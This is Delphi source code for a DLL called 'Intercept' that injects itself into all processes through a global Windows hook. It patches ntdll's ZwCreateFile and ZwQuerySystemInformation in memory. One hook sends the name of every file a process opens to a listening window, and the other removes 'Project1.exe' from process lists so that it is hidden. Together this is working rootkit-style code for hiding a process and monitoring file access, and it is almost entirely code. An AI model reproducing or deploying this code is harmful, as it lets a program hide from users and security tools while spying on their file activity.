library Intercept;

{ Important note about DLL memory management: ShareMem must be the
  first unit in your library's USES clause AND your project's (select
  Project-View Source) USES clause if your DLL exports any procedures or
  functions that pass strings as parameters or function results. This
  applies to all strings passed to and from your DLL--even those that
  are nested in records and classes. ShareMem is the interface unit to
  the BORLNDMM.DLL shared memory manager, which must be deployed along
  with your DLL. To avoid using BORLNDMM.DLL, pass string information
  using PChar or ShortString parameters. }

uses
  SysUtils,
  Classes, Windows, {NativeAPI,} messages, Dialogs;

type
 TLogData = record
    AppName:ShortString; //  
    FileName:ShortString;
    CommandLine:ShortString;
    {FuncName: String[8];  //  
    FuncPointer: Integer; //  
    IP: String[15];       // IP 
    Port: Cardinal;       // 
    Buff: array [0..$FFFF] of Char; //  
    BuffSize: Word;       //  }
  end;

 PVOID=pointer;
 NTStatus=cardinal; 

 OldCode = packed record
  One: dword;
  two: word;
 end;


far_jmp = packed record
  PuhsOp: byte;
  PushArg: pointer;
  RetOp: byte;
 end;

 VM_COUNTERS = packed record
   PeakVirtualSize,
   VirtualSize,
   PageFaultCount,
   PeakWorkingSetSize,
   WorkingSetSize,
   QuotaPeakPagedPoolUsage,
   QuotaPagedPoolUsage,
   QuotaPeakNonPagedPoolUsage,
   QuotaNonPagedPoolUsage,
   PagefileUsage,
   PeakPagefileUsage: dword;
  end;

 IO_COUNTERS = packed record
   ReadOperationCount,
   WriteOperationCount,
   OtherOperationCount,
   ReadTransferCount,
   WriteTransferCount,
   OtherTransferCount: LARGE_INTEGER;
  end;

 PClientID = ^TClientID;
 TClientID = packed record
  UniqueProcess:cardinal;
  UniqueThread:cardinal;
 end;

 PSYSTEM_THREADS = ^SYSTEM_THREADS;
 SYSTEM_THREADS = packed record
  KernelTime,
  UserTime,
  CreateTime: LARGE_INTEGER;
  WaitTime: dword;
  StartAddress: pointer;
  ClientId: TClientId;
  Priority,
  BasePriority,
  ContextSwitchCount: dword;
  State: dword;
  WaitReason: dword;
 end;

 PUnicodeString = ^TUnicodeString;
 TUnicodeString = packed record
  Length: Word;
  MaximumLength: Word;
  Buffer: PWideChar;
 end;

 PObjectAttributes = ^TObjectAttributes;
 TObjectAttributes = packed record
  Length: DWORD;
  RootDirectory: THandle;
  ObjectName: PUnicodeString;
  Attributes: DWORD;
  SecurityDescriptor: Pointer;
  SecurityQualityOfService: Pointer;
 end;

 PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
 IO_STATUS_BLOCK = packed record //		; sizeof = 08h
  Status:DWORD;//		?	; 0000h  NTSTATUS
  Information:DWORD;//
 end;

 TTHREADENTRY32 = packed record
  dwSize: DWORD;
  cntUsage: DWORD;
  th32ThreadID: DWORD;
  th32OwnerProcessID: DWORD;
  tpBasePri: Longint;
  tpDeltaPri: Longint;
  dwFlags: DWORD;
 end;

 PSpisokIp=^SpisokIp;
  SpisokIp=record
   AppWndHandle: HWND;
   OldHookHandle: HHOOK;
   {count:Integer;
   spisok:array[1..1000] of Longint;}
   //IsHook:boolean;
  end;

 PLARGE_INTEGER=^LARGE_INTEGER;

 SYSTEM_INFORMATION_CLASS = (
  SystemBasicInformation, SystemProcessorInformation, SystemPerformanceInformation,
  SystemTimeOfDayInformation, SystemNotImplemented1, SystemProcessesAndThreadsInformation,
  SystemCallCounts, SystemConfigurationInformation, SystemProcessorTimes, SystemGlobalFlag,
  SystemNotImplemented2, SystemModuleInformation, SystemLockInformation, SystemNotImplemented3,
  SystemNotImplemented4, SystemNotImplemented5, SystemHandleInformation, SystemObjectInformation,
  SystemPagefileInformation, SystemInstructionEmulationCounts, SystemInvalidInfoClass1,
  SystemCacheInformation, SystemPoolTagInformation, SystemProcessorStatistics,
  SystemDpcInformation, SystemNotImplemented6, SystemLoadImage, SystemUnloadImage,
  SystemTimeAdjustment, SystemNotImplemented7, SystemNotImplemented8, SystemNotImplemented9,
  SystemCrashDumpInformation, SystemExceptionInformation, SystemCrashDumpStateInformation,
  SystemKernelDebuggerInformation, SystemContextSwitchInformation, SystemRegistryQuotaInformation,
  SystemLoadAndCallImage, SystemPrioritySeparation, SystemNotImplemented10,
  SystemNotImplemented11, SystemInvalidInfoClass2, SystemInvalidInfoClass3,
  SystemTimeZoneInformation, SystemLookasideInformation, SystemSetTimeSlipEvent,
  SystemCreateSession, SystemDeleteSession, SystemInvalidInfoClass4, SystemRangeStartInformation,
  SystemVerifierInformation, SystemAddVerifier, SystemSessionProcessesInformation);

PCardinal=^Cardinal;

PSYSTEM_PROCESSES = ^SYSTEM_PROCESSES;
SYSTEM_PROCESSES = packed record
   NextEntryDelta,
   ThreadCount: dword;
   Reserved1 : array [0..5] of dword;
   CreateTime,
   UserTime,
   KernelTime: LARGE_INTEGER;
   ProcessName: TUnicodeString;
   BasePriority: dword;
   ProcessId,
   InheritedFromProcessId,
   HandleCount: dword;
   Reserved2: array [0..1] of dword;
   VmCounters: VM_COUNTERS;
   IoCounters: IO_COUNTERS; // Windows 2000 only
   Threads: array [0..0] of SYSTEM_THREADS;
  end;


 function CreateToolhelp32Snapshot(dwFlags, th32ProcessID: DWORD): dword;
         stdcall; external 'kernel32.dll';

 Function Thread32First(hSnapshot: THandle; var lpte: TThreadEntry32): BOOL;
         stdcall;external 'kernel32.dll';

 Function OpenThread(dwDesiredAccess: dword; bInheritHandle: bool;
                   dwThreadId: dword): dword; stdcall; external 'kernel32.dll';

 Function Thread32Next(hSnapshot: THandle; var lpte: TThreadENtry32): BOOL;
         stdcall;external 'kernel32.dll';

 function ZwCreateFile(OUT FileHandle:PHANDLE;
    const DesiredAccess:ACCESS_MASK;
    const ObjectAttributes:POBJECTATTRIBUTES;
    OUT IoStatusBlock:PIO_STATUS_BLOCK;
    const AllocationSize:PLARGE_INTEGER;
    const FileAttributes,
    ShareAccess,
    CreateDisposition,
    CreateOptions:ULONG;
    const EaBuffer:PVoid;
    const EaLength:ULONG):NTSTATUS; stdcall; external 'ntdll.dll';

 function ZwQuerySystemInformation(ASystemInformationClass: dword;
                                  ASystemInformation: Pointer;
                                  ASystemInformationLength: dword;
                                  AReturnLength: PCardinal): LongInt;
         stdcall; external 'ntdll.dll';



var
 AdrZwCreateFile:FARPROC=nil;
 OldZwCreateFile: OldCode;
 StabZwCreateFile:far_jmp;

 AdrZwQuerySystemInformation:FARPROC=nil;
 OldZwQuerySystemInformation:OldCode;
 StabZwQuerySystemInformation:far_jmp;

 s:string;
 written:ULONG;
 dirs:TStringList;

 FMapping:cardinal;
 FSpisokIp:PSpisokIp=nil;
 HEvent_:cardinal;

const
  WLX_SAS_ACTION_LOGON   = $01;
  THREAD_SUSPEND_RESUME  = $02;
  TH32CS_SNAPTHREAD      = $04;

  STATUS_SUCCESS              = NTStatus($00000000);
  STATUS_ACCESS_DENIED        = NTStatus($C0000022);
  STATUS_INFO_LENGTH_MISMATCH = NTStatus($C0000004);
  SEVERITY_ERROR              = NTStatus($C0000000);

  GlobMapID='Hook for Interception {72A60550-1F32-40AA-8537-EC2C7A854CD1}';

 

Procedure StopThreads;
var
 h, CurrTh, ThrHandle, CurrPr: dword;
 Thread: TThreadEntry32;
begin
 CurrTh := GetCurrentThreadId;
 CurrPr := GetCurrentProcessId;
 h := CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
 if h <> INVALID_HANDLE_VALUE then
   begin
    Thread.dwSize := SizeOf(TThreadEntry32);
    if Thread32First(h, Thread) then
    repeat
     if (Thread.th32ThreadID <> CurrTh) and (Thread.th32OwnerProcessID = CurrPr) then
      begin
       ThrHandle := OpenThread(THREAD_SUSPEND_RESUME, false, Thread.th32ThreadID);
       if ThrHandle>0 then
         begin
          SuspendThread(ThrHandle);
          CloseHandle(ThrHandle);
         end;
       end;
    until not Thread32Next(h, Thread);
   CloseHandle(h);
   end;
end;

Procedure RunThreads;
var
 h, CurrTh, ThrHandle, CurrPr: dword;
 Thread: TThreadEntry32;
begin
 CurrTh := GetCurrentThreadId;
 CurrPr := GetCurrentProcessId;
 h := CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
 if h <> INVALID_HANDLE_VALUE then
   begin
    Thread.dwSize := SizeOf(TThreadEntry32);
    if Thread32First(h, Thread) then
    repeat
     if (Thread.th32ThreadID <> CurrTh) and (Thread.th32OwnerProcessID = CurrPr) then
      begin
       ThrHandle := OpenThread(THREAD_SUSPEND_RESUME, false, Thread.th32ThreadID);
       if ThrHandle>0 then
         begin
          ResumeThread(ThrHandle);
          CloseHandle(ThrHandle);
         end;
       end;
    until not Thread32Next(h, Thread);
   CloseHandle(h);
   end;
end;
 

//   ZwCreateFile
function TrueZwCreateFile(OUT FileHandle:PHANDLE;
    const DesiredAccess:ACCESS_MASK;
    const ObjectAttributes:POBJECTATTRIBUTES;
    OUT IoStatusBlock:PIO_STATUS_BLOCK;
    const AllocationSize:PLARGE_INTEGER;
    const FileAttributes,
    ShareAccess,
    CreateDisposition,
    CreateOptions:ULONG;
    const EaBuffer:PVoid;
    const EaLength:ULONG):NTSTATUS; stdcall;
var
 Written: dword;
begin
//  
  WriteProcessMemory(INVALID_HANDLE_VALUE, AdrZwCreateFile,
                     @OldZwCreateFile, SizeOf(OldCode), Written);

//   ZwCreateFile
  Result := ZwCreateFile(FileHandle,
    DesiredAccess,
    ObjectAttributes,
    IoStatusBlock,
    AllocationSize,
    FileAttributes,
    ShareAccess,
    CreateDisposition,
    CreateOptions,
    EaBuffer,
    EaLength);

//  
  WriteProcessMemory(INVALID_HANDLE_VALUE, AdrZwCreateFile,
                     @StabZwCreateFile, SizeOf(far_jmp), Written);
end;

function NewZwCreateFile(OUT FileHandle:PHANDLE;
    const DesiredAccess:ACCESS_MASK;
    const ObjectAttributes:POBJECTATTRIBUTES;
    OUT IoStatusBlock:PIO_STATUS_BLOCK;
    const AllocationSize:PLARGE_INTEGER;
    const FileAttributes,
    ShareAccess,
    CreateDisposition,
    CreateOptions:ULONG;
    const EaBuffer:PVoid;
    const EaLength:ULONG):NTSTATUS;  stdcall;
var
  FileName: array [0..MAX_PATH - 1] of Char;
  CDS: TCopyDataStruct;
  Data: TLogData;
  str:TStringList;
begin
 //s:=WideCharToString(ObjectAttributes^.ObjectName^.Buffer);

 GetModuleFileName(GetModuleHandle(nil), @FileName, SizeOf(FileName));
 Data.AppName:=string(FileName);
 Data.FileName:=WideCharToString(ObjectAttributes^.ObjectName^.Buffer);
 CDS.dwData:=0;
 CDS.cbData:=SizeOf(TLogData);
 CDS.lpData:=@Data;

 SendMessage(FSpisokIp^.AppWndHandle, WM_COPYDATA, 0, Integer(@CDS));

 //MessageBeep(100);

 result:=TrueZwCreateFile(FileHandle,DesiredAccess,ObjectAttributes,IoStatusBlock,AllocationSize,FileAttributes,ShareAccess,CreateDisposition,CreateOptions,EaBuffer,EaLength);
end;

Function TrueZwQuerySystemInformation(ASystemInformationClass: dword;
                                  ASystemInformation: Pointer;
                                  ASystemInformationLength: dword;
                                  AReturnLength: PCardinal): LongInt; stdcall;
var
 Written: dword;
begin
  WriteProcessMemory(INVALID_HANDLE_VALUE, AdrZwQuerySystemInformation,
                     @OldZwQuerySystemInformation, SizeOf(OldCode), Written);

  Result := ZwQuerySystemInformation(ASystemInformationClass,
                                     ASystemInformation,
                                     ASystemInformationLength,
                                     AReturnLength);

  WriteProcessMemory(INVALID_HANDLE_VALUE, AdrZwQuerySystemInformation,
                     @StabZwQuerySystemInformation, SizeOf(far_jmp), Written);
end;

Function NewZwQuerySystemInformation(ASystemInformationClass: dword;
                                  ASystemInformation: Pointer;
                                  ASystemInformationLength: dword;
                                  AReturnLength: PCardinal): LongInt; stdcall;
var
 Info, Prev: PSYSTEM_PROCESSES;
begin
 Result := TrueZwQuerySystemInformation(ASystemInformationClass,
                                        ASystemInformation,
                                        ASystemInformationLength,
                                        AReturnLength);

 if (ASystemInformationClass = dword(SystemProcessesAndThreadsInformation)) and
    (Result = STATUS_SUCCESS) then
    begin
      Info := ASystemInformation;
      while(Info^.NextEntryDelta > 0) do
       begin
         Prev := Info;
         Info := pointer(dword(Info) + Info^.NextEntryDelta);
         if lstrcmpiw(Info^.ProcessName.Buffer, 'Project1.exe') = 0 then
           Prev^.NextEntryDelta := Prev^.NextEntryDelta + Info^.NextEntryDelta;
       end;
    end;
end;


Procedure SetHook();
var
 Bytes: dword;
begin
 //StopThreads;
//   ZwCreateFile 
 AdrZwCreateFile:=GetProcAddress(GetModuleHandle('ntdll.dll'), 'ZwCreateFile');
 If AdrZwCreateFile<>nil then
 begin
  //      
  ReadProcessMemory(INVALID_HANDLE_VALUE, AdrZwCreateFile, @OldZwCreateFile,
   SizeOf(OldCode), Bytes);

  //  
  StabZwCreateFile.PuhsOp:=$68;
  StabZwCreateFile.PushArg:=@NewZwCreateFile;
  StabZwCreateFile.RetOp:=$C3;

  //  
  WriteProcessMemory(INVALID_HANDLE_VALUE, AdrZwCreateFile, @StabZwCreateFile,
   SizeOf(far_jmp), Bytes);
 end;

 AdrZwQuerySystemInformation:=GetProcAddress(GetModuleHandle('ntdll.dll'),
  'ZwQuerySystemInformation');
 If AdrZwQuerySystemInformation<>nil then
 begin
   //ShowMessage('Ok');
  //      
  ReadProcessMemory(INVALID_HANDLE_VALUE, AdrZwQuerySystemInformation,
   @OldZwQuerySystemInformation, SizeOf(OldCode), Bytes);

  //  
  StabZwQuerySystemInformation.PuhsOp:=$68;
  StabZwQuerySystemInformation.PushArg:=@NewZwQuerySystemInformation;
  StabZwQuerySystemInformation.RetOp:=$C3;

  //  
  WriteProcessMemory(INVALID_HANDLE_VALUE, AdrZwQuerySystemInformation,
   @StabZwQuerySystemInformation, SizeOf(far_jmp), Bytes);
 end;
  
 //RunThreads;
end;

// 
Procedure Unhook();
var
 Bytes: dword;
begin
//   
 WriteProcessMemory(INVALID_HANDLE_VALUE, AdrZwCreateFile, @OldZwCreateFile,
  SizeOf(OldCode), Bytes);

 WriteProcessMemory(INVALID_HANDLE_VALUE, AdrZwQuerySystemInformation,
  @OldZwQuerySystemInformation, SizeOf(OldCode), Bytes);
end;

procedure Unhook_leasten;
begin
 If WaitForSingleObject(HEvent_, infinite)=WAIT_OBJECT_0 then
 begin
  Unhook();
 end;
end;

Function MessageProc(code:integer; wParam:word;
 lParam:longint):longint; stdcall;
begin
 CallNextHookEx(0, Code, wParam, lparam);
 Result:=0;
end;

Procedure SetGlobalHookProc();
begin
 SetWindowsHookEx(WH_CBT{WH_GETMESSAGE}, @MessageProc, HInstance, 0);
 Sleep(INFINITE);
end;

Procedure SetGlobalHook();
var
 hMutex: dword;
 TrId: dword;
begin
 hMutex:=CreateMutex(nil, false, 'Intercept');
 if GetLastError=0 then
 CreateThread(nil, 0, @SetGlobalHookProc, nil, 0, TrId)
 else
 CloseHandle(hMutex);
end;

procedure DLLEntryPoint(dwReason:DWord);
var
  htch, itch:cardinal;
begin
 case dwReason of
//        -  
  DLL_PROCESS_ATTACH:begin
   FMapping:=CreateFileMapping(INVALID_HANDLE_VALUE, NIL, PAGE_READWRITE, 0,
    SizeOf(SpisokIp), GlobMapID);
   FSpisokIp:=MapViewOfFile(FMapping, FILE_MAP_ALL_ACCESS, 0, 0, 0);
   SetGlobalHook();
   SetHook();
   HEvent_:=OpenEvent(EVENT_ALL_ACCESS, False, 'MyEvent');
   htch:=CreateThread(nil, 0, @Unhook_leasten, nil, 0, itch);
   CloseHandle(htch);
  end;
  DLL_PROCESS_DETACH:begin
//   -  
   Unhook();
   {UnMapViewOfFile(FSpisokIp);
   CloseHandle(FMapping);}
  end;
 end;
end;


begin
 //     dll
 DllProc:=@DLLEntryPoint;
//.. dll      
 DLLEntryPoint(DLL_PROCESS_ATTACH);
end.
